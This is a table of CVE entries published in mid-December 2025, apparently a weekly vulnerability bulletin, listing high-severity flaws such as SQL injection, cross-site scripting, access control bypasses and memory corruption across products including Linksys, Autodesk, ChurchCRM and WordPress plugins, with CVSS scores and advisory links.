| Linksys--Linksys E9450-SG | Successful exploitation of the vulnerability could allow an attacker with local network access to send a specially crafted URL to access certain administration functions without login credentials. | 2025-12-19 | 8.8 | CVE-2025-52692 | https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-118/ |
| BullWall--Ransomware Containment | BullWall Ransomware Containment contains excluded file paths, such as '$recycle.bin' that are not monitored. An attacker with file write permissions could bypass detection by renaming a directory. Versions 4.6.0.0, 4.6.0.6, 4.6.0.7, and 4.6.1.4 were confirmed to be affected; other versions before and after may also be affected. | 2025-12-18 | 8.8 | CVE-2025-62001 | url url |
| Microsoft--Azure Cosmos DB | Improper neutralization of input during web page generation ('cross-site scripting') in Azure Cosmos DB allows an unauthorized attacker to perform spoofing over a network. | 2025-12-18 | 8.3 | CVE-2025-64675 | Azure Cosmos DB Spoofing Vulnerability |
| Microsoft--Office Out-of-Box Experience | Improper neutralization of input during web page generation ('cross-site scripting') in Office Out-of-Box Experience allows an unauthorized attacker to perform spoofing over a network. | 2025-12-18 | 8.2 | CVE-2025-64677 | Office Out-of-Box Experience Spoofing Vulnerability |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. Prior to version 6.5.3, a SQL injection vulnerability exists in the `src/ListEvents.php` file. When filtering events by type, the `WhichType` POST parameter is not properly sanitized or type-casted before being used in multiple SQL queries. This allows any authenticated user to execute arbitrary SQL commands, including time-based blind SQL injection attacks. Any authenticated user, regardless of their privilege level, can execute arbitrary queries on the database. This could allow them to exfiltrate, modify, or delete any data in the database, including user credentials, financial data, and personal information, leading to a full compromise of the application's data. Version 6.5.3 fixes the issue. | 2025-12-17 | 8.8 | CVE-2025-66395 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-c9xf-f3gr-xfwv |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. Prior to version 6.5.3, the allowRegistration, acceptKiosk, reloadKiosk, and identifyKiosk functions in the Kiosk Manager feature suffers from broken access control, allowing any authenticated user to allow and accept kiosk registrations, and perform other Kiosk Manager actions such as reload and identify. Version 6.5.3 fixes the issue. | 2025-12-17 | 8.3 | CVE-2025-66397 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-32vr-ch3p-wmr5 |
| C4illin--ConvertX | ConvertXis a self-hosted online file converter. In versions prior to 0.16.0, the endpoint `/upload` allows an authenticated user to write arbitrary files on the system, overwriting binaries and allowing code execution. The upload function takes `file.name` directly from user supplied data without doing any sanitization on the name thus allowing for arbitrary file write. This can be used to overwrite system binaries with ones provided from an attacker allowing full code execution. Version 0.16.0 contains a patch for the issue. | 2025-12-16 | 8.8 | CVE-2025-66449 | https://github.com/C4illin/ConvertX/security/advisories/GHSA-cpww-gwgc-p72r https://github.com/C4illin/ConvertX/commit/550f472451755d095cf5802bc91f403e85b7129e https://github.com/C4illin/ConvertX/blob/4ae2aab66ace7cdcc14c5a16ecaaf2372b9ccbdf/src/pages/upload.tsx#L27-L30 |
| Mintlify--Mintlify Platform | A Server-Side Template Injection (SSTI) vulnerability in the MDX Rendering Engine in Mintlify Platform before 2025-11-15 allows remote attackers to execute arbitrary code via inline JSX expressions in an MDX file. | 2025-12-19 | 8.3 | CVE-2025-67843 | https://www.mintlify.com/docs/changelog https://www.mintlify.com/blog/working-with-security-researchers-november-2025 https://kibty.town/blog/mintlify/ https://news.ycombinator.com/item?id=46317098 |
| error311--FileRise | FileRise is a self-hosted web file manager / WebDAV server. Versions prior to 2.7.1 are vulnerable to Stored Cross-Site Scripting (XSS) due to unsafe handling of browser-renderable user uploads when served through the sharing and download endpoints. An attacker who can get a crafted SVG (primary) or HTML (secondary) file stored in a FileRise instance can cause JavaScript execution when a victim opens a generated share link (and in some cases via the direct download endpoint). This impacts share links (`/api/file/share.php`) and direct file access / download path (`/api/file/download.php`), depending on browser/content-type behavior. Version 2.7.1 fixes the issue. | 2025-12-16 | 8.9 | CVE-2025-68116 | https://github.com/error311/FileRise/security/advisories/GHSA-35pp-ggh6-c59c |
| opensourcepos--opensourcepos | Open Source Point of Sale (opensourcepos) is a web based point of sale application written in PHP using CodeIgniter framework. Starting in version 3.4.0 and prior to version 3.4.2, a Stored Cross-Site Scripting (XSS) vulnerability exists in the "Return Policy" configuration field. The application does not properly sanitize user input before saving it to the database or displaying it on receipts. An attacker with access to the "Store Configuration" (such as a rogue administrator or an account compromised via the separate CSRF vulnerability) can inject malicious JavaScript payloads into this field. These payloads are executed in the browser of any user (including other administrators and sales staff) whenever they view a receipt or complete a transaction. This can lead to session hijacking, theft of sensitive data, or unauthorized actions performed on behalf of the victim. The vulnerability has been patched in version 3.4.2 by ensuring the output is escaped using the `esc()` function in the receipt template. As a temporary mitigation, administrators should ensure the "Return Policy" field contains only plain text and strictly avoid entering any HTML tags. There is no code-based workaround other than applying the patch. | 2025-12-17 | 8.1 | CVE-2025-68147 | https://github.com/opensourcepos/opensourcepos/security/advisories/GHSA-xgr7-7pvw-fpmh https://github.com/opensourcepos/opensourcepos/commit/22297a https://github.com/Nixon-H/CVE-2025-68147-OSPOS-Stored-XSS |
| sebhildebrandt--systeminformation | systeminformation is a System and OS information library for node.js. In versions prior to 5.27.14, the `fsSize()` function in systeminformation is vulnerable to OS command injection on Windows systems. The optional `drive` parameter is directly concatenated into a PowerShell command without sanitization, allowing arbitrary command execution when user-controlled input reaches this function. The actual exploitability depends on how applications use this function. If an application does not pass user-controlled input to `fsSize()`, it is not vulnerable. Version 5.27.14 contains a patch. | 2025-12-16 | 8.1 | CVE-2025-68154 | https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-wphj-fx3q-84ch https://github.com/sebhildebrandt/systeminformation/commit/c52f9fd07fef42d2d8e8c66f75b42178da701c68 |
| opensourcepos--opensourcepos | Open Source Point of Sale (opensourcepos) is a web based point of sale application written in PHP using CodeIgniter framework. Starting in version 3.4.0 and prior to version 3.4.2, a Cross-Site Request Forgery (CSRF) vulnerability exists in the application's filter configuration. The CSRF protection mechanism was **explicitly disabled**, allowing the application to process state-changing requests (POST) without verifying a valid CSRF token. An unauthenticated remote attacker can exploit this by hosting a malicious web page. If a logged-in administrator visits this page, their browser is forced to send unauthorized requests to the application. A successful exploit allows the attacker to silently create a new Administrator account with full privileges, leading to a complete takeover of the system and loss of confidentiality, integrity, and availability. The vulnerability has been patched in version 3.4.2. The fix re-enables the CSRF filter in `app/Config/Filters.php` and resolves associated AJAX race conditions by adjusting token regeneration settings. As a workaround, administrators can manually re-enable the CSRF filter in `app/Config/Filters.php` by uncommenting the protection line. However, this is not recommended without applying the full patch, as it may cause functionality breakage in the Sales module due to token synchronization issues. | 2025-12-17 | 8.8 | CVE-2025-68434 | https://github.com/opensourcepos/opensourcepos/security/advisories/GHSA-wjm4-hfwg-5w5r https://github.com/opensourcepos/opensourcepos/pull/4349 https://github.com/opensourcepos/opensourcepos/commit/d575c8da9a1d7af8313a1e758e000e243f5614ef https://github.com/Nixon-H/CVE-2025-68434-OSPOS-CSRF-Unauthorized-Administrator-Creation |
| Hitachi Vantara--Pentaho Data Integration and Analytics | Pentaho Data Integration and Analytics Community Dashboard Editor plugin versions before 10.2.0.4, including 9.3.0.x and 8.3.x, deserialize untrusted JSON data without constraining the parser to approved classes and methods. | 2025-12-15 | 8.8 | CVE-2025-9121 | https://support.pentaho.com/hc/en-us/articles/41832536185613--Resolved-Hitachi-Vantara-Pentaho-Business-Analytics-Server-Deserialization-of-Untrusted-Data-Versions-before-10-2-0-4-Impacted-CVE-2025-9121 |
| Kentico--Xperience | An access control bypass vulnerability in Kentico Xperience allows administrators to modify global administrator user privileges via unauthorized requests. Attackers could potentially compromise global administrator accounts and invalidate security-sensitive macros by manipulating user privilege levels. | 2025-12-18 | 7.2 | CVE-2020-36890 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 10 Administrator Access Control Bypass |
| Kentico--Xperience | A cryptography vulnerability in Kentico Xperience allows attackers to potentially manipulate URL hash values through existing hashing mechanisms. The hotfix introduces an additional security layer to prevent hash value reuse and potential exploitation. | 2025-12-18 | 7.5 | CVE-2021-47712 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 12.0.102 URL Hashing Cryptography Vulnerability |
| HappyFiles--HappyFiles Pro | Missing Authorization vulnerability in HappyFiles HappyFiles Pro happyfiles-pro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects HappyFiles Pro: from n/a through 1.8.1. | 2025-12-21 | 7.7 | CVE-2023-25446 | https://vdp.patchstack.com/database/wordpress/plugin/happyfiles-pro/vulnerability/wordpress-happyfiles-pro-plugin-1-8-1-broken-access-control?_s_id=cve |
| D-Link--DAP-1325 | D-Link DAP-1325 firmware version 1.01 contains a broken access control vulnerability that allows unauthenticated attackers to download device configuration settings without authentication. Attackers can exploit the /cgi-bin/ExportSettings.sh endpoint to retrieve sensitive configuration information by directly accessing the export settings script. | 2025-12-16 | 7.5 | CVE-2023-53896 | ExploitDB-51556 D-Link DAP-1325 Product Webpage VulnCheck Advisory: D-Link DAP-1325 Hardware A1 Unauthenticated Configuration Download |
| Kentico--Xperience | A denial of service vulnerability in Kentico Xperience allows attackers to launch DoS attacks via specially crafted requests to the GetResource handler. Improper input validation enables remote attackers to potentially disrupt service availability through maliciously constructed requests. | 2025-12-18 | 7.5 | CVE-2023-53934 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 12.0.98 GetResource Handler Denial of Service |
| Hubstaff--Hubstaff | Hubstaff 1.6.14 contains a DLL search order hijacking vulnerability that allows attackers to replace a missing system32 wow64log.dll with a malicious library. Attackers can generate a custom DLL using Metasploit and place it in the system32 directory to obtain a reverse shell during application startup. | 2025-12-18 | 7.8 | CVE-2023-53937 | ExploitDB-51461 Official Product Homepage VulnCheck Advisory: Hubstaff 1.6.14 DLL Search Order Hijacking via wow64log Library |
| Alfonzm--Codigo Markdown Editor | Codigo Markdown Editor 1.0.1 contains a code execution vulnerability that allows attackers to run arbitrary system commands by crafting a malicious markdown file. Attackers can embed a video source with an onerror event that executes shell commands through Node.js child_process module when the file is opened. | 2025-12-18 | 7.8 | CVE-2023-53940 | ExploitDB-51432 Product GitHub Repository VulnCheck Advisory: Codigo Markdown Editor 1.0.1 Electron Arbitrary Code Execution via Markdown File |
| ltb-project--LDAP Tool Box Self Service Password | LDAP Tool Box Self Service Password 1.5.2 contains a password reset vulnerability that allows attackers to manipulate HTTP Host headers during token generation. Attackers can craft malicious password reset requests that generate tokens sent to a controlled server, enabling potential account takeover by intercepting and using stolen reset tokens. | 2025-12-19 | 7.5 | CVE-2023-53958 | ExploitDB-51275 Official Product Homepage VulnCheck Advisory: LDAP Tool Box Self Service Password 1.5.2 Account Takeover via HTTP Host Header |
| Utarit Information Services Inc.--SoliClub | Use of Hard-coded Credentials vulnerability in Utarit Information Services Inc. SoliClub allows Read Sensitive Constants Within an Executable.This issue affects SoliClub: from 5.2.4 before 5.3.7. | 2025-12-18 | 7.5 | CVE-2025-1029 | https://www.usom.gov.tr/bildirim/tr-25-0466 |
| Utarit Informatics Services Inc.--SoliClub | Exposure of Private Personal Information to an Unauthorized Actor vulnerability in Utarit Informatics Services Inc. SoliClub allows Query System for Information.This issue affects SoliClub: from 5.2.4 before 5.3.7. | 2025-12-18 | 7.5 | CVE-2025-1030 | https://www.usom.gov.tr/bildirim/tr-25-0466 |
| Utarit Informatics Services Inc.--SoliClub | Authorization Bypass Through User-Controlled Key vulnerability in Utarit Informatics Services Inc. SoliClub allows Functionality Misuse.This issue affects SoliClub: from 5.2.4 before 5.3.7. | 2025-12-18 | 7.5 | CVE-2025-1031 | https://www.usom.gov.tr/bildirim/tr-25-0466 |
| Autodesk--Shared Components | A maliciously crafted CATPRODUCT file, when parsed through certain Autodesk products, can force a Heap-Based Overflow vulnerability. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-10881 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | AA maliciously crafted X_T file, when parsed through certain Autodesk products, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-10882 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | A maliciously crafted CATPRODUCT file, when parsed through certain Autodesk products, can force an Out-of-Bounds Read vulnerability. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-10883 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | AA maliciously crafted CATPART file, when parsed through certain Autodesk products, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-10884 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | A maliciously crafted MODEL file, when parsed through certain Autodesk products, can force a Memory corruption vulnerability. A malicious actor can leverage this vulnerability to execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-10886 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | A maliciously crafted MODEL file, when parsed through certain Autodesk products, can force a Memory corruption vulnerability. A malicious actor can leverage this vulnerability to execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-10887 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | AA maliciously crafted MODEL file, when parsed through certain Autodesk products, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-10888 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | A maliciously crafted CATPART file, when parsed through certain Autodesk products, can force a Memory corruption vulnerability. A malicious actor can leverage this vulnerability to execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-10889 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | AA maliciously crafted MODEL file, when parsed through certain Autodesk products, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-10898 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | AA maliciously crafted MODEL file, when parsed through certain Autodesk products, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-10899 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Autodesk--Shared Components | AA maliciously crafted MODEL file, when parsed through certain Autodesk products, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-10900 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| kstover--Ninja Forms The Contact Form Builder That Grows With You | The Ninja Forms - The Contact Form Builder That Grows With You plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 3.13.2. This is due to the plugin not properly verifying that a user is authorized before the `ninja-forms-views` REST endpoints return form metadata and submission content. This makes it possible for unauthenticated attackers to read arbitrary form definitions and submission records via a leaked bearer token granted they can load any page containing the Submissions Table block. NOTE: The developer released a patch for this issue in 3.13.1, but inadvertently introduced a REST API endpoint in which a valid bearer token could be minted for arbitrary form IDs, making this patch ineffective. | 2025-12-17 | 7.5 | CVE-2025-11924 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4240cdae-9122-443e-8a7e-3369e74384be?source=cve https://plugins.trac.wordpress.org/changeset/3415563/ninja-forms |
| wpxpo--Post Grid Gutenberg Blocks for News, Magazines, Blog Websites PostX | The Post Grid Gutenberg Blocks for News, Magazines, Blog Websites - PostX plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the '/ultp/v2/get_dynamic_content/' REST API endpoint in all versions up to, and including, 5.0.3. This makes it possible for unauthenticated attackers to retrieve sensitive user metadata, including password hashes. | 2025-12-21 | 7.5 | CVE-2025-12980 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e85ff3b3-de41-4ac4-b825-b3238725ca44?source=cve https://plugins.trac.wordpress.org/changeset/3421729/ultimate-post/trunk/classes/Blocks.php |
| Menulux Software Inc.--Mobile App | Authorization Bypass Through User-Controlled Key vulnerability in Menulux Software Inc. Mobile App allows Exploitation of Trusted Identifiers.This issue affects Mobile App: before 9.5.8. | 2025-12-16 | 7.5 | CVE-2025-13474 | https://www.usom.gov.tr/bildirim/tr-25-0457 |
| bplugins--HTML5 Audio Player The Ultimate No-Code Podcast, MP3 & Audio Player | The HTML5 Audio Player - The Ultimate No-Code Podcast, MP3 & Audio Player plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions from 2.4.0 up to, and including, 2.5.1 via the getIcyMetadata() function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. | 2025-12-19 | 7.2 | CVE-2025-13999 | https://www.wordfence.com/threat-intel/vulnerabilities/id/989b4b9d-e22e-46a7-8ebc-5c8b33f98111?source=cve https://plugins.trac.wordpress.org/changeset?old=3394789&old_path=html5-audio-player%2Ftags%2F2.5.1%2Finc%2FCore%2FAjax.php&new=3419843&new_path=html5-audio-player%2Ftags%2F2.5.2%2Finc%2FCore%2FAjax.php |
| LINE Corporation--LINE client for iOS | LINE client for iOS prior to 15.4 allows man-in-the-middle attacks due to improper SSL/TLS certificate validation in an integrated financial SDK. The SDK interfered with the application's network processing, causing server certificate verification to be disabled for a significant portion of network traffic, which could allow a network-adjacent attacker to intercept or modify encrypted communications. | 2025-12-15 | 7.7 | CVE-2025-14022 | https://hackerone.com/reports/2853445 |
| EnterpriseDB--Hybrid Manager - LTS | EDB Hybrid Manager contains a flaw that allows an unauthenticated attacker to directly access certain gRPC endpoints. This could allow an attacker to read potentially sensitive data or possibly cause a denial-of-service by writing malformed data to certain gRPC endpoints. This flaw has been remediated in EDB Hybrid Manager 1.3.3, and customers should consider upgrading to 1.3.3 as soon as possible. The flaw is due to a misconfiguration in the Istio Gateway, which manages authentication and authorization for the affected endpoints. The security policy relies on an explicit definition of required permissions in the Istio Gateway configuration, and the affected endpoints were not defined in the configuration. This allowed requests to bypass both authentication and authorization within a Hybrid Manager service. All versions of Hybrid Manager - LTS should be upgraded to 1.3.3, and all versions of Hybrid Manager - Innovation should be upgraded to 2025.12. | 2025-12-15 | 7 | CVE-2025-14038 | https://www.enterprisedb.com/docs/security/advisories/cve202514038/ |
| livecomposer--Live Composer Free WordPress Website Builder | The Live Composer - Free WordPress Website Builder plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.0.2 via deserialization of untrusted input in the dslc_module_posts_output shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable plugin, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present. | 2025-12-21 | 7.5 | CVE-2025-14071 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4b15c991-5256-405c-8382-85dba6f032ba?source=cve https://plugins.trac.wordpress.org/browser/live-composer-page-builder/trunk/modules/posts/module.php#L2807 https://plugins.trac.wordpress.org/browser/live-composer-page-builder/tags/1.5.53/modules/posts/module.php#L2807 https://github.com/live-composer/live-composer-page-builder/commit/2b0b430ab107eb6cb72196251e429a695c11e41b https://plugins.trac.wordpress.org/changeset/3419715/live-composer-page-builder/trunk/modules/posts/module.php |
| Radiometer Medical Aps--ABL90 FLEX and ABL90 FLEX PLUS Analyzers | A vulnerability in the application software of multiple Radiometer products may allow remote code execution and unauthorized device management when specific internal conditions are met. Exploitation requires that a remote connection is established with additional information obtained through other means. The issue is caused by a weakness in the analyzer's application software. Other related CVE's are CVE-2025-14095 & CVE-2025-14096. Affected customers have been informed about this vulnerability. This CVE is being published to provide transparency. Required Configuration for Exposure: Affected application software version is in use and remote support feature is enabled in the analyzer. Temporary work Around: If the network is not considered secure, please remove the analyzer from the network. Permanent solution: Customers should ensure the following: • The network is secure, and access follows best practices. Local Radiometer representatives will contact all affected customers to discuss a permanent solution. Exploit Status: Researchers have provided working proof-of-concept (PoC). Radiometer is not aware of any publicly available exploits at the time of this publication. | 2025-12-17 | 7.2 | CVE-2025-14097 | https://www.radiometer.com/myradiometer |
| GG Soft Software Services Inc.--PaperWork | Authorization Bypass Through User-Controlled Key vulnerability in GG Soft Software Services Inc. PaperWork allows Exploitation of Trusted Identifiers.This issue affects PaperWork: from 5.2.0.9427 before 6.0. | 2025-12-17 | 7.1 | CVE-2025-14101 | https://www.usom.gov.tr/bildirim/tr-25-0464 |
| Advantech--SUSI | An Improper Access Control vulnerability in Advantech SUSI driver (susi.sys) allows attackers to read/write arbitrary memory, I/O ports, and MSRs, resulting in privilege escalation, arbitrary code execution, and information disclosure. This issue affects Advantech SUSI: 5.0.24335 and prior. | 2025-12-16 | 7.8 | CVE-2025-14252 | https://www.txone.com/psirt/advisories/CVE-2025-14252 |
| Acer--ListCheck.exe | ListCheck.exe developed by Acer has a Local Privilege Escalation vulnerability. Authenticated local attackers can replace ListCheck.exe with a malicious executable of the same name, which will be executed by the system and result in privilege escalation. | 2025-12-17 | 7.8 | CVE-2025-14305 | https://www.twcert.org.tw/tw/cp-132-10580-01ad5-1.html https://www.twcert.org.tw/en/cp-139-10581-16346-2.html |
| wpdevelop--Booking Calendar | The Booking Calendar plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'dates_to_check' parameter in all versions up to, and including, 10.14.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-12-15 | 7.5 | CVE-2025-14383 | https://www.wordfence.com/threat-intel/vulnerabilities/id/790f93b0-eb69-473f-a726-bfe215f5d870?source=cve https://plugins.trac.wordpress.org/changeset/3416518/booking/trunk/includes/_capacity/capacity.php |
| wpmudev--Hummingbird Performance Cache & Page Speed Optimization for Core Web Vitals | Critical CSS | Minify CSS | Defer CSS Javascript | CDN | The Hummingbird Performance plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.18.0 via the 'request' function. This makes it possible for unauthenticated attackers to extract sensitive data including Cloudflare API credentials. | 2025-12-18 | 7.5 | CVE-2025-14437 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8755ab3f-ee77-44ea-8620-590f1f1cb333?source=cve https://plugins.trac.wordpress.org/changeset/3421187/hummingbird-performance |
| AWS--Harmonix on AWS | An overly-permissive IAM trust policy in the Harmonix on AWS framework may allow IAM principals in the same AWS account to escalate privileges via role assumption. The sample code for the EKS environment provisioning role is configured to trust the account root principal, which may enable any IAM principal in the same AWS account with sts:AssumeRole permissions to assume the role with administrative privileges. We recommend customers upgrade to Harmonix on AWS v0.4.2 or later if you have deployed the framework using versions v0.3.0 through v0.4.1. | 2025-12-15 | 7.2 | CVE-2025-14503 | https://github.com/awslabs/harmonix/pull/189 https://aws.amazon.com/security/security-bulletins/AWS-2025-031/ https://github.com/awslabs/harmonix/security/advisories/GHSA-qm86-gqrq-mqcw |
| Autodesk--Shared Components | A maliciously crafted CATPART file, when parsed through certain Autodesk products, can force an Out-of-Bounds Read vulnerability. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process. | 2025-12-15 | 7.8 | CVE-2025-14593 | https://www.autodesk.com/products/autodesk-access/overview https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0024 |
| Arcadia Technology, LLC--Crafty Controller | An input neutralization vulnerability in the Server MOTD component of Crafty Controller allows a remote, unauthenticated attacker to perform stored XSS via server MOTD modification. | 2025-12-17 | 7.1 | CVE-2025-14701 | GitLab Issue #647 |
| Shiguangwu--sgwbox N3 | A vulnerability was found in Shiguangwu sgwbox N3 2.0.25. The impacted element is an unknown function of the file /eshell of the component API. The manipulation results in path traversal. It is possible to launch the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 7.3 | CVE-2025-14704 | VDB-336421 | Shiguangwu sgwbox N3 API eshell path traversal VDB-336421 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #706915 | sgwbox N3 NAS V2.0.25 Directory Traversal https://www.notion.so/sgwbox-NAS-N3-Directory-Traversal-2be6cf4e528a802a9c0ad6f01b75694e?source=copy_link |
| FantasticLBP--Hotels Server | A vulnerability was detected in FantasticLBP Hotels Server up to 67b44df162fab26df209bd5d5d542875fcbec1d0. This affects an unknown part of the file /controller/api/OrderList.php. The manipulation of the argument telephone results in sql injection. The attack can be executed remotely. The exploit is now public and may be used. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 7.3 | CVE-2025-14710 | VDB-336427 | FantasticLBP Hotels Server OrderList.php sql injection VDB-336427 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #707082 | GitHub/FantasticLBP Hotels_Server master-67b44df162fab26df209bd5d5d542875fcbec1d0 SQL Injection https://github.com/navex2/CVE/issues/3 |
| FantasticLBP--Hotels Server | A flaw has been found in FantasticLBP Hotels Server up to 67b44df162fab26df209bd5d5d542875fcbec1d0. This vulnerability affects unknown code of the file /controller/api/hotelList.php. This manipulation of the argument pickedHotelName/type causes sql injection. The attack is possible to be carried out remotely. The exploit has been published and may be used. This product adopts a rolling release strategy to maintain continuous delivery The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 7.3 | CVE-2025-14711 | VDB-336428 | FantasticLBP Hotels Server hotelList.php sql injection VDB-336428 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #707083 | GitHub/FantasticLBP Hotels_Server master-67b44df162fab26df209bd5d5d542875fcbec1d0 SQL Injection Submit #707085 | GitHub/FantasticLBP Hotels_Server master-67b44df162fab26df209bd5d5d542875fcbec1d0 SQL Injection (Duplicate) https://github.com/navex2/CVE/issues/1 https://github.com/navex2/CVE/issues/2 |
| JHENG GAO--Student Learning Assessment and Support System | Student Learning Assessment and Support System developed by JHENG GAO has a Exposure of Sensitive Information vulnerability, allowing unauthenticated remote attackers to view a specific page and obtain test accounts and password. | 2025-12-15 | 7.5 | CVE-2025-14712 | https://www.twcert.org.tw/tw/cp-132-10570-72e31-1.html https://www.twcert.org.tw/en/cp-139-10571-a0c2a-2.html |
| The Browser Company of New York--ArcSearch | ArcSearch for Android versions prior to 1.12.6 could display a different domain in the address bar than the content being shown, enabling address bar spoofing after user interaction via crafted web content. | 2025-12-19 | 7.4 | CVE-2025-14809 | https://arc.net/security/bulletins#cve-2025-14809-address-bar-spoofing-risk-navigation-trigger-uri-confusion-on-arcsearch-android |
| The Browser Company of New York--ArcSearch | ArcSearch for iOS versions prior to 1.45.2 could display a different domain in the address bar than the content being shown after an iframe-triggered URI-scheme navigation, increasing spoofing risk. | 2025-12-19 | 7.5 | CVE-2025-14812 | https://arc.net/security/bulletins#cve-2025-14812-address-bar-spoofing-risk-iframe-triggered-uri-navigation-on-arc-search-ios |
| itsourcecode--Online Cake Ordering System | A vulnerability was identified in itsourcecode Online Cake Ordering System 1.0. The affected element is an unknown function of the file /updateproduct.php?action=edit. Such manipulation of the argument ID leads to sql injection. It is possible to launch the attack remotely. The exploit is publicly available and might be used. | 2025-12-17 | 7.3 | CVE-2025-14832 | VDB-336981 | itsourcecode Online Cake Ordering System updateproduct.php sql injection VDB-336981 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #715063 | itsourcecode Online Cake Ordering System V1.0 SQL Injection https://github.com/ZhangYu-del/cve/issues/1 https://itsourcecode.com/ |
| code-projects--Online Appointment Booking System | A security flaw has been discovered in code-projects Online Appointment Booking System 1.0. The impacted element is an unknown function of the file /admin/deletemanagerclinic.php. Performing manipulation of the argument clinic results in sql injection. The attack can be initiated remotely. The exploit has been released to the public and may be exploited. | 2025-12-17 | 7.3 | CVE-2025-14833 | VDB-336982 | code-projects Online Appointment Booking System deletemanagerclinic.php sql injection VDB-336982 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #715073 | code-projects Online Appointment Booking System V1.0 SQL injection https://github.com/Sqli22/Sqli/issues/2 https://code-projects.org/ |
